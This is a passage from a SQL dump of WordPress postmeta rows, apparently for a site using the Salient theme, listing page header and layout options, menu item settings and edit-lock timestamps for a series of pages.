oltip'),(5128,6462,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5129,6462,'_nectar_full_screen_rows_footer','none'),(5130,6462,'_nectar_slider_bg_type','image_bg'),(5131,6462,'_nectar_canvas_shapes',''),(5132,6462,'_nectar_media_upload_webm',''),(5133,6462,'_nectar_media_upload_mp4',''),(5134,6462,'_nectar_media_upload_ogv',''),(5135,6462,'_nectar_slider_preview_image',''),(5136,6462,'_nectar_header_bg',''),(5137,6462,'_nectar_header_parallax','off'),(5138,6462,'_nectar_header_box_roll','off'),(5139,6462,'_nectar_header_bg_height',''),(5140,6462,'_nectar_header_fullscreen','off'),(5141,6462,'_nectar_header_title',''),(5142,6462,'_nectar_header_subtitle',''),(5143,6462,'_nectar_page_header_text-effect','none'),(5144,6462,'_nectar_particle_rotation_timing',''),(5145,6462,'_nectar_particle_disable_explosion','off'),(5146,6462,'_nectar_page_header_alignment','left'),(5147,6462,'_nectar_page_header_alignment_v','middle'),(5148,6462,'_nectar_page_header_bg_alignment','center'),(5149,6462,'_nectar_header_bg_color',''),(5150,6462,'_nectar_header_font_color',''),(5151,6462,'_nectar_header_bg_overlay_color',''),(5152,6462,'_disable_transparent_header','off'),(5153,6462,'_force_transparent_header','off'),(5154,6462,'_wpb_vc_js_status','false'),(5156,6462,'_dp_original','6275'),(5157,6462,'_edit_lock','1514951239:1'),(5158,6462,'_edit_last','1'),(5159,6464,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5160,6464,'_menu_item_type','post_type'),(5161,6464,'_menu_item_menu_item_parent','6277'),(5162,6464,'_menu_item_object_id','6462'),(5163,6464,'_menu_item_object','page'),(5164,6464,'_menu_item_target',''),(5165,6464,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5166,6464,'_menu_item_xfn',''),(5167,6464,'_menu_item_url',''),(5169,6465,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5170,6465,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5171,6465,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5172,6465,'_wp_page_template','default'),(5173,6465,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5174,6465,'nectar-metabox-portfolio-display-sortable','off'),(5175,6465,'_nectar_full_screen_rows','off'),(5176,6465,'_nectar_full_screen_rows_animation','none'),(5177,6465,'_nectar_full_screen_rows_animation_speed','medium'),(5178,6465,'_nectar_full_screen_rows_overall_bg_color',''),(5179,6465,'_nectar_full_screen_rows_anchors','off'),(5180,6465,'_nectar_full_screen_rows_mobile_disable','off'),(5181,6465,'_nectar_full_screen_rows_row_bg_animation','none'),(5182,6465,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5183,6465,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5184,6465,'_nectar_full_screen_rows_footer','none'),(5185,6465,'_nectar_slider_bg_type','image_bg'),(5186,6465,'_nectar_canvas_shapes',''),(5187,6465,'_nectar_media_upload_webm',''),(5188,6465,'_nectar_media_upload_mp4',''),(5189,6465,'_nectar_media_upload_ogv',''),(5190,6465,'_nectar_slider_preview_image',''),(5191,6465,'_nectar_header_bg',''),(5192,6465,'_nectar_header_parallax','off'),(5193,6465,'_nectar_header_box_roll','off'),(5194,6465,'_nectar_header_bg_height',''),(5195,6465,'_nectar_header_fullscreen','off'),(5196,6465,'_nectar_header_title',''),(5197,6465,'_nectar_header_subtitle',''),(5198,6465,'_nectar_page_header_text-effect','none'),(5199,6465,'_nectar_particle_rotation_timing',''),(5200,6465,'_nectar_particle_disable_explosion','off'),(5201,6465,'_nectar_page_header_alignment','left'),(5202,6465,'_nectar_page_header_alignment_v','middle'),(5203,6465,'_nectar_page_header_bg_alignment','center'),(5204,6465,'_nectar_header_bg_color',''),(5205,6465,'_nectar_header_font_color',''),(5206,6465,'_nectar_header_bg_overlay_color',''),(5207,6465,'_disable_transparent_header','off'),(5208,6465,'_force_transparent_header','off'),(5209,6465,'_wpb_vc_js_status','false'),(5211,6465,'_dp_original','6275'),(5212,6465,'_edit_lock','1514951509:1'),(5213,6465,'_edit_last','1'),(5214,6467,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5215,6467,'_menu_item_type','post_type'),(5216,6467,'_menu_item_menu_item_parent','6277'),(5217,6467,'_menu_item_object_id','6465'),(5218,6467,'_menu_item_object','page'),(5219,6467,'_menu_item_target',''),(5220,6467,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5221,6467,'_menu_item_xfn',''),(5222,6467,'_menu_item_url',''),(5224,6468,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5225,6468,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5226,6468,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5227,6468,'_wp_page_template','default'),(5228,6468,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5229,6468,'nectar-metabox-portfolio-display-sortable','off'),(5230,6468,'_nectar_full_screen_rows','off'),(5231,6468,'_nectar_full_screen_rows_animation','none'),(5232,6468,'_nectar_full_screen_rows_animation_speed','medium'),(5233,6468,'_nectar_full_screen_rows_overall_bg_color',''),(5234,6468,'_nectar_full_screen_rows_anchors','off'),(5235,6468,'_nectar_full_screen_rows_mobile_disable','off'),(5236,6468,'_nectar_full_screen_rows_row_bg_animation','none'),(5237,6468,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5238,6468,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5239,6468,'_nectar_full_screen_rows_footer','none'),(5240,6468,'_nectar_slider_bg_type','image_bg'),(5241,6468,'_nectar_canvas_shapes',''),(5242,6468,'_nectar_media_upload_webm',''),(5243,6468,'_nectar_media_upload_mp4',''),(5244,6468,'_nectar_media_upload_ogv',''),(5245,6468,'_nectar_slider_preview_image',''),(5246,6468,'_nectar_header_bg',''),(5247,6468,'_nectar_header_parallax','off'),(5248,6468,'_nectar_header_box_roll','off'),(5249,6468,'_nectar_header_bg_height',''),(5250,6468,'_nectar_header_fullscreen','off'),(5251,6468,'_nectar_header_title',''),(5252,6468,'_nectar_header_subtitle',''),(5253,6468,'_nectar_page_header_text-effect','none'),(5254,6468,'_nectar_particle_rotation_timing',''),(5255,6468,'_nectar_particle_disable_explosion','off'),(5256,6468,'_nectar_page_header_alignment','left'),(5257,6468,'_nectar_page_header_alignment_v','middle'),(5258,6468,'_nectar_page_header_bg_alignment','center'),(5259,6468,'_nectar_header_bg_color',''),(5260,6468,'_nectar_header_font_color',''),(5261,6468,'_nectar_header_bg_overlay_color',''),(5262,6468,'_disable_transparent_header','off'),(5263,6468,'_force_transparent_header','off'),(5264,6468,'_wpb_vc_js_status','false'),(5266,6468,'_dp_original','6275'),(5267,6468,'_edit_lock','1514951708:1'),(5268,6468,'_edit_last','1'),(5269,6470,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5270,6470,'_menu_item_type','post_type'),(5271,6470,'_menu_item_menu_item_parent','6277'),(5272,6470,'_menu_item_object_id','6468'),(5273,6470,'_menu_item_object','page'),(5274,6470,'_menu_item_target',''),(5275,6470,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5276,6470,'_menu_item_xfn',''),(5277,6470,'_menu_item_url',''),(5279,6471,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5280,6471,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5281,6471,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5282,6471,'_wp_page_template','default'),(5283,6471,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5284,6471,'nectar-metabox-portfolio-display-sortable','off'),(5285,6471,'_nectar_full_screen_rows','off'),(5286,6471,'_nectar_full_screen_rows_animation','none'),(5287,6471,'_nectar_full_screen_rows_animation_speed','medium'),(5288,6471,'_nectar_full_screen_rows_overall_bg_color',''),(5289,6471,'_nectar_full_screen_rows_anchors','off'),(5290,6471,'_nectar_full_screen_rows_mobile_disable','off'),(5291,6471,'_nectar_full_screen_rows_row_bg_animation','none'),(5292,6471,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5293,6471,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5294,6471,'_nectar_full_screen_rows_footer','none'),(5295,6471,'_nectar_slider_bg_type','image_bg'),(5296,6471,'_nectar_canvas_shapes',''),(5297,6471,'_nectar_media_upload_webm',''),(5298,6471,'_nectar_media_upload_mp4',''),(5299,6471,'_nectar_media_upload_ogv',''),(5300,6471,'_nectar_slider_preview_image',''),(5301,6471,'_nectar_header_bg',''),(5302,6471,'_nectar_header_parallax','off'),(5303,6471,'_nectar_header_box_roll','off'),(5304,6471,'_nectar_header_bg_height',''),(5305,6471,'_nectar_header_fullscreen','off'),(5306,6471,'_nectar_header_title',''),(5307,6471,'_nectar_header_subtitle',''),(5308,6471,'_nectar_page_header_text-effect','none'),(5309,6471,'_nectar_particle_rotation_timing',''),(5310,6471,'_nectar_particle_disable_explosion','off'),(5311,6471,'_nectar_page_header_alignment','left'),(5312,6471,'_nectar_page_header_alignment_v','middle'),(5313,6471,'_nectar_page_header_bg_alignment','center'),(5314,6471,'_nectar_header_bg_color',''),(5315,6471,'_nectar_header_font_color',''),(5316,6471,'_nectar_header_bg_overlay_color',''),(5317,6471,'_disable_transparent_header','off'),(5318,6471,'_force_transparent_header','off'),(5319,6471,'_wpb_vc_js_status','false'),(5321,6471,'_dp_original','6275'),(5322,6471,'_edit_lock','1514951829:1'),(5323,6471,'_edit_last','1'),(5324,6473,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5325,6473,'_menu_item_type','post_type'),(5326,6473,'_menu_item_menu_item_parent','6277'),(5327,6473,'_menu_item_object_id','6471'),(5328,6473,'_menu_item_object','page'),(5329,6473,'_menu_item_target',''),(5330,6473,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5331,6473,'_menu_item_xfn',''),(5332,6473,'_menu_item_url',''),(5334,6474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5335,6474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5336,6474,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5337,6474,'_wp_page_template','default'),(5338,6474,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5339,6474,'nectar-metabox-portfolio-display-sortable','off'),(5340,6474,'_nectar_full_screen_rows','off'),(5341,6474,'_nectar_full_screen_rows_animation','none'),(5342,6474,'_nectar_full_screen_rows_animation_speed','medium'),(5343,6474,'_nectar_full_screen_rows_overall_bg_color',''),(5344,6474,'_nectar_full_screen_rows_anchors','off'),(5345,6474,'_nectar_full_screen_rows_mobile_disable','off'),(5346,6474,'_nectar_full_screen_rows_row_bg_animation','none'),(5347,6474,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5348,6474,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5349,6474,'_nectar_full_screen_rows_footer','none'),(5350,6474,'_nectar_slider_bg_type','image_bg'),(5351,6474,'_nectar_canvas_shapes',''),(5352,6474,'_nectar_media_upload_webm',''),(5353,6474,'_nectar_media_upload_mp4',''),(5354,6474,'_nectar_media_upload_ogv',''),(5355,6474,'_nectar_slider_preview_image',''),(5356,6474,'_nectar_header_bg',''),(5357,6474,'_nectar_header_parallax','off'),(5358,6474,'_nectar_header_box_roll','off'),(5359,6474,'_nectar_header_bg_height',''),(5360,6474,'_nectar_header_fullscreen','off'),(5361,6474,'_nectar_header_title',''),(5362,6474,'_nectar_header_subtitle',''),(5363,6474,'_nectar_page_header_text-effect','none'),(5364,6474,'_nectar_particle_rotation_timing',''),(5365,6474,'_nectar_particle_disable_explosion','off'),(5366,6474,'_nectar_page_header_alignment','left'),(5367,6474,'_nectar_page_header_alignment_v','middle'),(5368,6474,'_nectar_page_header_bg_alignment','center'),(5369,6474,'_nectar_header_bg_color',''),(5370,6474,'_nectar_header_font_color',''),(5371,6474,'_nectar_header_bg_overlay_color',''),(5372,6474,'_disable_transparent_header','off'),(5373,6474,'_force_transparent_header','off'),(5374,6474,'_wpb_vc_js_status','false'),(5376,6474,'_dp_original','6275'),(5377,6474,'_edit_lock','1514951927:1'),(5378,6474,'_edit_last','1'),(5379,6476,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5380,6476,'_menu_item_type','post_type'),(5381,6476,'_menu_item_menu_item_parent','6277'),(5382,6476,'_menu_item_object_id','6474'),(5383,6476,'_menu_item_object','page'),(5384,6476,'_menu_item_target',''),(5385,6476,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5386,6476,'_menu_item_xfn',''),(5387,6476,'_menu_item_url',''),(5389,6477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5390,6477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5391,6477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5392,6477,'_wp_page_template','default'),(5393,6477,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5394,6477,'nectar-metabox-portfolio-display-sortable','off'),(5395,6477,'_nectar_full_screen_rows','off'),(5396,6477,'_nectar_full_screen_rows_animation','none'),(5397,6477,'_nectar_full_screen_rows_animation_speed','medium'),(5398,6477,'_nectar_full_screen_rows_overall_bg_color',''),(5399,6477,'_nectar_full_screen_rows_anchors','off'),(5400,6477,'_nectar_full_screen_rows_mobile_disable','off'),(5401,6477,'_nectar_full_screen_rows_row_bg_animation','none'),(5402,6477,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5403,6477,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5404,6477,'_nectar_full_screen_rows_footer','none'),(5405,6477,'_nectar_slider_bg_type','image_bg'),(5406,6477,'_nectar_canvas_shapes',''),(5407,6477,'_nectar_media_upload_webm',''),(5408,6477,'_nectar_media_upload_mp4',''),(5409,6477,'_nectar_media_upload_ogv',''),(5410,6477,'_nectar_slider_preview_image',''),(5411,6477,'_nectar_header_bg',''),(5412,6477,'_nectar_header_parallax','off'),(5413,6477,'_nectar_header_box_roll','off'),(5414,6477,'_nectar_header_bg_height',''),(5415,6477,'_nectar_header_fullscreen','off'),(5416,6477,'_nectar_header_title',''),(5417,6477,'_nectar_header_subtitle',''),(5418,6477,'_nectar_page_header_text-effect','none'),(5419,6477,'_nectar_particle_rotation_timing',''),(5420,6477,'_nectar_particle_disable_explosion','off'),(5421,6477,'_nectar_page_header_alignment','left'),(5422,6477,'_nectar_page_header_alignment_v','middle'),(5423,6477,'_nectar_page_header_bg_alignment','center'),(5424,6477,'_nectar_header_bg_color',''),(5425,6477,'_nectar_header_font_color',''),(5426,6477,'_nectar_header_bg_overlay_color',''),(5427,6477,'_disable_transparent_header','off'),(5428,6477,'_force_transparent_header','off'),(5429,6477,'_wpb_vc_js_status','false'),(5431,6477,'_dp_original','6275'),(5432,6477,'_edit_lock','1514952008:1'),(5433,6477,'_edit_last','1'),(5434,6479,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5435,6479,'_menu_item_type','post_type'),(5436,6479,'_menu_item_menu_item_parent','6277'),(5437,6479,'_menu_item_object_id','6477'),(5438,6479,'_menu_item_object','page'),(5439,6479,'_menu_item_target',''),(5440,6479,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5441,6479,'_menu_item_xfn',''),(5442,6479,'_menu_item_url',''),(5444,6480,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5445,6480,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5446,6480,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5447,6480,'_wp_page_template','default'),(5448,6480,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5449,6480,'nectar-metabox-portfolio-display-sortable','off'),(5450,6480,'_nectar_full_screen_rows','off'),(5451,6480,'_nectar_full_screen_rows_animation','none'),(5452,6480,'_nectar_full_screen_rows_animation_speed','medium'),(5453,6480,'_nectar_full_screen_rows_overall_bg_color',''),(5454,6480,'_nectar_full_screen_rows_anchors','off'),(5455,6480,'_nectar_full_screen_rows_mobile_disable','off'),(5456,6480,'_nectar_full_screen_rows_row_bg_animation','none'),(5457,6480,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5458,6480,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5459,6480,'_nectar_full_screen_rows_footer','none'),(5460,6480,'_nectar_slider_bg_type','image_bg'),(5461,6480,'_nectar_canvas_shapes',''),(5462,6480,'_nectar_media_upload_webm',''),(5463,6480,'_nectar_media_upload_mp4',''),(5464,6480,'_nectar_media_upload_ogv',''),(5465,6480,'_nectar_slider_preview_image',''),(5466,6480,'_nectar_header_bg',''),(5467,6480,'_nectar_header_parallax','off'),(5468,6480,'_nectar_header_box_roll','off'),(5469,6480,'_nectar_header_bg_height',''),(5470,6480,'_nectar_header_fullscreen','off'),(5471,6480,'_nectar_header_title',''),(5472,6480,'_nectar_header_subtitle',''),(5473,6480,'_nectar_page_header_text-effect','none'),(5474,6480,'_nectar_particle_rotation_timing',''),(5475,6480,'_nectar_particle_disable_explosion','off'),(5476,6480,'_nectar_page_header_alignment','left'),(5477,6480,'_nectar_page_header_alignment_v','middle'),(5478,6480,'_nectar_page_header_bg_alignment','center'),(5479,6480,'_nectar_header_bg_color',''),(5480,6480,'_nectar_header_font_color',''),(5481,6480,'_nectar_header_bg_overlay_color',''),(5482,6480,'_disable_transparent_header','off'),(5483,6480,'_force_transparent_header','off'),(5484,6480,'_wpb_vc_js_status','false'),(5486,6480,'_dp_original','6275'),(5487,6480,'_edit_lock','1514952239:1'),(5488,6480,'_edit_last','1'),(5489,6482,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5490,6482,'_menu_item_type','post_type'),(5491,6482,'_menu_item_menu_item_parent','0'),(5492,6482,'_menu_item_object_id','6480'),(5493,6482,'_menu_item_object','page'),(5494,6482,'_menu_item_target',''),(5495,6482,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5496,6482,'_menu_item_xfn',''),(5497,6482,'_menu_item_url',''),(5498,6482,'_menu_item_orphaned','1514952270'),(5499,6483,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5500,6483,'_menu_item_type','post_type'),(5501,6483,'_menu_item_menu_item_parent','6277'),(5502,6483,'_menu_item_object_id','6480'),(5503,6483,'_menu_item_object','page'),(5504,6483,'_menu_item_target',''),(5505,6483,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5506,6483,'_menu_item_xfn',''),(5507,6483,'_menu_item_url',''),(5509,6484,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5510,6484,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5511,6484,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5512,6484,'_wp_page_template','default'),(5513,6484,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5514,6484,'nectar-metabox-portfolio-display-sortable','off'),(5515,6484,'_nectar_full_screen_rows','off'),(5516,6484,'_nectar_full_screen_rows_animation','none'),(5517,6484,'_nectar_full_screen_rows_animation_speed','medium'),(5518,6484,'_nectar_full_screen_rows_overall_bg_color',''),(5519,6484,'_nectar_full_screen_rows_anchors','off'),(5520,6484,'_nectar_full_screen_rows_mobile_disable','off'),(5521,6484,'_nectar_full_screen_rows_row_bg_animation','none'),(5522,6484,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5523,6484,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5524,6484,'_nectar_full_screen_rows_footer','none'),(5525,6484,'_nectar_slider_bg_type','image_bg'),(5526,6484,'_nectar_canvas_shapes',''),(5527,6484,'_nectar_media_upload_webm',''),(5528,6484,'_nectar_media_upload_mp4',''),(5529,6484,'_nectar_media_upload_ogv',''),(5530,6484,'_nectar_slider_preview_image',''),(5531,6484,'_nectar_header_bg',''),(5532,6484,'_nectar_header_parallax','off'),(5533,6484,'_nectar_header_box_roll','off'),(5534,6484,'_nectar_header_bg_height',''),(5535,6484,'_nectar_header_fullscreen','off'),(5536,6484,'_nectar_header_title',''),(5537,6484,'_nectar_header_subtitle',''),(5538,6484,'_nectar_page_header_text-effect','none'),(5539,6484,'_nectar_particle_rotation_timing',''),(5540,6484,'_nectar_particle_disable_explosion','off'),(5541,6484,'_nectar_page_header_alignment','left'),(5542,6484,'_nectar_page_header_alignment_v','middle'),(5543,6484,'_nectar_page_header_bg_alignment','center'),(5544,6484,'_nectar_header_bg_color',''),(5545,6484,'_nectar_header_font_color',''),(5546,6484,'_nectar_header_bg_overlay_color',''),(5547,6484,'_disable_transparent_header','off'),(5548,6484,'_force_transparent_header','off'),(5549,6484,'_wpb_vc_js_status','false'),(5551,6484,'_dp_original','6278'),(5552,6484,'_edit_lock','1514952330:1'),(5553,6484,'_edit_last','1'),(5554,6486,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5555,6486,'_menu_item_type','post_type'),(5556,6486,'_menu_item_menu_item_parent','6280'),(5557,6486,'_menu_item_object_id','6484'),(5558,6486,'_menu_item_object','page'),(5559,6486,'_menu_item_target',''),(5560,6486,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5561,6486,'_menu_item_xfn',''),(5562,6486,'_menu_item_url',''),(5564,6487,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5565,6487,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5566,6487,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5567,6487,'_wp_page_template','default'),(5568,6487,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5569,6487,'nectar-metabox-portfolio-display-sortable','off'),(5570,6487,'_nectar_full_screen_rows','off'),(5571,6487,'_nectar_full_screen_rows_animation','none'),(5572,6487,'_nectar_full_screen_rows_animation_speed','medium'),(5573,6487,'_nectar_full_screen_rows_overall_bg_color',''),(5574,6487,'_nectar_full_screen_rows_anchors','off'),(5575,6487,'_nectar_full_screen_rows_mobile_disable','off'),(5576,6487,'_nectar_full_screen_rows_row_bg_animation','none'),(5577,6487,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5578,6487,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5579,6487,'_nectar_full_screen_rows_footer','none'),(5580,6487,'_nectar_slider_bg_type','image_bg'),(5581,6487,'_nectar_canvas_shapes',''),(5582,6487,'_nectar_media_upload_webm',''),(5583,6487,'_nectar_media_upload_mp4',''),(5584,6487,'_nectar_media_upload_ogv',''),(5585,6487,'_nectar_slider_preview_image',''),(5586,6487,'_nectar_header_bg',''),(5587,6487,'_nectar_header_parallax','off'),(5588,6487,'_nectar_header_box_roll','off'),(5589,6487,'_nectar_header_bg_height',''),(5590,6487,'_nectar_header_fullscreen','off'),(5591,6487,'_nectar_header_title',''),(5592,6487,'_nectar_header_subtitle',''),(5593,6487,'_nectar_page_header_text-effect','none'),(5594,6487,'_nectar_particle_rotation_timing',''),(5595,6487,'_nectar_particle_disable_explosion','off'),(5596,6487,'_nectar_page_header_alignment','left'),(5597,6487,'_nectar_page_header_alignment_v','middle'),(5598,6487,'_nectar_page_header_bg_alignment','center'),(5599,6487,'_nectar_header_bg_color',''),(5600,6487,'_nectar_header_font_color',''),(5601,6487,'_nectar_header_bg_overlay_color',''),(5602,6487,'_disable_transparent_header','off'),(5603,6487,'_force_transparent_header','off'),(5604,6487,'_wpb_vc_js_status','false'),(5606,6487,'_dp_original','6278'),(5607,6487,'_edit_lock','1514952409:1'),(5608,6487,'_edit_last','1'),(5609,6489,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5610,6489,'_menu_item_type','post_type'),(5611,6489,'_menu_item_menu_item_parent','6280'),(5612,6489,'_menu_item_object_id','6487'),(5613,6489,'_menu_item_object','page'),(5614,6489,'_menu_item_target',''),(5615,6489,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5616,6489,'_menu_item_xfn',''),(5617,6489,'_menu_item_url',''),(5619,6490,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5620,6490,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5621,6490,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5622,6490,'_wp_page_template','default'),(5623,6490,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5624,6490,'nectar-metabox-portfolio-display-sortable','off'),(5625,6490,'_nectar_full_screen_rows','off'),(5626,6490,'_nectar_full_screen_rows_animation','none'),(5627,6490,'_nectar_full_screen_rows_animation_speed','medium'),(5628,6490,'_nectar_full_screen_rows_overall_bg_color',''),(5629,6490,'_nectar_full_screen_rows_anchors','off'),(5630,6490,'_nectar_full_screen_rows_mobile_disable','off'),(5631,6490,'_nectar_full_screen_rows_row_bg_animation','none'),(5632,6490,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5633,6490,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5634,6490,'_nectar_full_screen_rows_footer','none'),(5635,6490,'_nectar_slider_bg_type','image_bg'),(5636,6490,'_nectar_canvas_shapes',''),(5637,6490,'_nectar_media_upload_webm',''),(5638,6490,'_nectar_media_upload_mp4',''),(5639,6490,'_nectar_media_upload_ogv',''),(5640,6490,'_nectar_slider_preview_image',''),(5641,6490,'_nectar_header_bg',''),(5642,6490,'_nectar_header_parallax','off'),(5643,6490,'_nectar_header_box_roll','off'),(5644,6490,'_nectar_header_bg_height',''),(5645,6490,'_nectar_header_fullscreen','off'),(5646,6490,'_nectar_header_title',''),(5647,6490,'_nectar_header_subtitle',''),(5648,6490,'_nectar_page_header_text-effect','none'),(5649,6490,'_nectar_particle_rotation_timing',''),(5650,6490,'_nectar_particle_disable_explosion','off'),(5651,6490,'_nectar_page_header_alignment','left'),(5652,6490,'_nectar_page_header_alignment_v','middle'),(5653,6490,'_nectar_page_header_bg_alignment','center'),(5654,6490,'_nectar_header_bg_color',''),(5655,6490,'_nectar_header_font_color',''),(5656,6490,'_nectar_header_bg_overlay_color',''),(5657,6490,'_disable_transparent_header','off'),(5658,6490,'_force_transparent_header','off'),(5659,6490,'_wpb_vc_js_status','false'),(5661,6490,'_dp_original','6278'),(5662,6490,'_edit_lock','1514952479:1'),(5663,6490,'_edit_last','1'),(5664,6492,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5665,6492,'_menu_item_type','post_type'),(5666,6492,'_menu_item_menu_item_parent','6280'),(5667,6492,'_menu_item_object_id','6490'),(5668,6492,'_menu_item_object','page'),(5669,6492,'_menu_item_target',''),(5670,6492,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5671,6492,'_menu_item_xfn',''),(5672,6492,'_menu_item_url',''),(5674,6493,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5675,6493,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5676,6493,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5677,6493,'_wp_page_template','default'),(5678,6493,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5679,6493,'nectar-metabox-portfolio-display-sortable','off'),(5680,6493,'_nectar_full_screen_rows','off'),(5681,6493,'_nectar_full_screen_rows_animation','none'),(5682,6493,'_nectar_full_screen_rows_animation_speed','medium'),(5683,6493,'_nectar_full_screen_rows_overall_bg_color',''),(5684,6493,'_nectar_full_screen_rows_anchors','off'),(5685,6493,'_nectar_full_screen_rows_mobile_disable','off'),(5686,6493,'_nectar_full_screen_rows_row_bg_animation','none'),(5687,6493,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5688,6493,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5689,6493,'_nectar_full_screen_rows_footer','none'),(5690,6493,'_nectar_slider_bg_type','image_bg'),(5691,6493,'_nectar_canvas_shapes',''),(5692,6493,'_nectar_media_upload_webm',''),(5693,6493,'_nectar_media_upload_mp4',''),(5694,6493,'_nectar_media_upload_ogv',''),(5695,6493,'_nectar_slider_preview_image',''),(5696,6493,'_nectar_header_bg',''),(5697,6493,'_nectar_header_parallax','off'),(5698,6493,'_nectar_header_box_roll','off'),(5699,6493,'_nectar_header_bg_height',''),(5700,6493,'_nectar_header_fullscreen','off'),(5701,6493,'_nectar_header_title',''),(5702,6493,'_nectar_header_subtitle',''),(5703,6493,'_nectar_page_header_text-effect','none'),(5704,6493,'_nectar_particle_rotation_timing',''),(5705,6493,'_nectar_particle_disable_explosion','off'),(5706,6493,'_nectar_page_header_alignment','left'),(5707,6493,'_nectar_page_header_alignment_v','middle'),(5708,6493,'_nectar_page_header_bg_alignment','center'),(5709,6493,'_nectar_header_bg_color',''),(5710,6493,'_nectar_header_font_color',''),(5711,6493,'_nectar_header_bg_overlay_color',''),(5712,6493,'_disable_transparent_header','off'),(5713,6493,'_force_transparent_header','off'),(5714,6493,'_wpb_vc_js_status','false'),(5716,6493,'_dp_original','6278'),(5717,6493,'_edit_lock','1514952584:1'),(5718,6493,'_edit_last','1'),(5719,6495,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5720,6495,'_menu_item_type',